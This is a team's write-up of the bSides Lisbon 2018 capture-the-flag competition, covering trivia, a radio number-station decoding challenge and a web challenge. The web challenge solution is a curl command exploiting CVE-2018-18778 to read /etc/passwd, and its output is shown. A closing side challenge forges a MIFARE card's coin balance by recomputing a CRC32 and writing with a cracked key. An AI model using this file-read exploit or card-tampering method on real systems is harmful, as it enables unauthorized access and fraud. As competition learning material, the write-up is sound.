bSides Lisbon Capture The Flag Write-up
Just like last year, we participated in the bSides Lisbon Capture The Flag security competition that took place a few days ago. The conference itself was excellent, with a diverse and very interesting presentation schedule.
bSides Lisbon was a two-day event, with the Capture The Flag(CTF) competition taking place on the first day, in parallel with the workshops. This year the teams were limited to 4 members, but the number of teams was the same, 10. Participation in the CTF was conditioned to those who did the qualifiers challenges and scored a place in the top 10.
We won the last two CTFs so we decided to apply the same recipe from last year, having Cláudio Gamboa again in our team.
3.5 hours later and this is how our dashboard looked like:
Challenges in black are the ones not solved (by our team), and the ones that nobody solved will likely show up in next year qualifiers, with some twist. Please note that not all challenges are shown in this image.
We will only explain the challenges we solved but we have to recognize the organization effort to have challenges that included very recent vulnerabilities, like Pwnable 100 with the CVE-2018–10933, aka SSH2_MSG_USERAUTH_SUCCESS.
Trivia
Router (100)
My router is high on drugs.
The answer was the KRACK, the vanity name of the attack that affects WPA2.
Bug (200)
Whats the vulnerability?
We were given a file, which contents were:
We (one of us) immediately recognized this as serialized Python so we wild guessed it should be related to the Python pickle library, used frequently in CTFs. After a few attempts, we found the right answer: deserialization.
Say My Name (300)
What’s rfp real name?
After submitting at least one Request For Proposal attempt (reminiscents from a corporate past..), we started googling for rfp in the hope something would show up. Quicky Rain Forest Puppy showed up which ringed the bell. Another google search and we got the answer: Jeff Forristal.
Web
Site (100)
We found bSidesLisbon 2018 development server at http://37.252.121.198:8080/
For some reason the site was not rendering.
When accessing the given URL, you would be presented with a 404 error page:
Following the bottom URL you could see that version 1.30 (one release after the one being used) fixed a CVE that allowed users to read arbitrary files:
New in version 1.30:
Enlarge request read buffer.
Fix security bug that let remote users read arbitrary files. (HuJin@topsec alpha_lab as CVE-2018–18778)
Reading about the CVE you could see that you only need to send an empty Host header and you could get any file, thus getting the flag:
$ curl -H “Host: “ http://37.252.121.198:8080/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-timesquare:x:100:103:flag{such_mini_code_much_critical_exploit},,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Physical
Baby No Hertz Me (100)
There is a rumor of a number station out there.
Note: 2 teams can be solving this in parallel.
On this first physical challenge we didn’t receive any instructions, only a radio. After some careful tuning (on 107.70 FM), you would hear a some music and a lot of numbers after that. We had to hear it 3 times to make sure that we got the right sequence, which was:
90109120104905111611497874910297696612288504965907057121817182112984957122975010811598727857
It looked like decimal ascii representation, so, we split it into:
90 109 120 104 90 51 116 114 97 87 49 102 97 69 66 122 88 50 49 65 90 70 57 121 81 71 82 112 98 49 57 122 97 50 108 115 98 72 78 57
It decoded as ZmxhZ3traW1faEBzX21AZF9yQGRpb19za2lsbHN9 that was base64 of flag{kim_h@s_m@d_r@dio_skills}.
This was the final classification, with us scoring a third place, and xSTF winning, followed by Mutiny. Congrats xSTF and Mutiny teams!!
Again, the bSides Lisbon team gave us another great CTF, with well-designed challenges that forced us to think and learn. And because they explain how the challenges can be solved in the conference final session, there is an extra chance to learn.
Obrigado bSides Lisbon!
ps: on the second day of the event we were told that there was an unhackable wallet on the event:
With our event access card we could check if we were ELITE, but every time we checked we would lose 500 bslxCoins (all participants started with 10000).
Using the MIFARE Classic Tool on an Android phone we tried to read the card, and got 3 sectors easily:
With this comparison we can see that only the sector 1 had changed after using the card. We can see the initial 10000 coins, and the resulting 9500, and below the value some gibberish that also changed. Using a proper diff tool, we can see what changed:
We can see the ascii representation of the value changing on block 1, and something that seems like some kind of hash on block 2.
After noticing that it was a small hash, we thought of crc32 right away, and went to check if it matched the values that we saw. It did :)
So because there were a few hints about being ELITE, we guessed that we had to change our value to 31337. We calculated the right crc32 for the value (2cf3179), and wrote it to the card after cracking the writing key (it was 010203040506).
And then went to check our wallet:
This was a really cool side challenge, props again to the bSides Lisbon team.
